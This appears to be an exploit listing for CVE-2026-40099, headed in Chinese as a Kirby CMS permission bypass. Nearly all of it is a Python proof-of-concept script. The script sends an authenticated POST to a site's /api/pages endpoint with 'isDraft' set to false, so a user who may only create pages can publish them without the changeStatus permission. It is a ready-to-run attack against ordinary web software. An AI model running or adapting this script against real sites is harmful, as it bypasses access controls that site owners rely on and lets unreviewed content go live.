CVE-2026-40099 Kirby CMS 权限绕过漏洞

import requests # Exploit Title: Kirby CMS Permission Bypass via REST API # Date: 2026-04-24 # CVE: CVE-2026-40099 target_url = "https://target-kirby-site.com/api/pages" # Attacker needs a valid session/token with 'pages.create' permission headers = { "Authorization": "Bearer <valid_token>", "Content-Type": "application/json" } # Payload overrides the default draft behavior payload = { "title": "Malicious Published Page", "slug": "malicious-page", "template": "default", "content": {"text": "This content is published without review."}, "isDraft": False # Bypassing the changeStatus permission } response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Vulnerability exploited! Page created as published.") print("[+] Response:", response.json()) else: print("[-] Request failed.")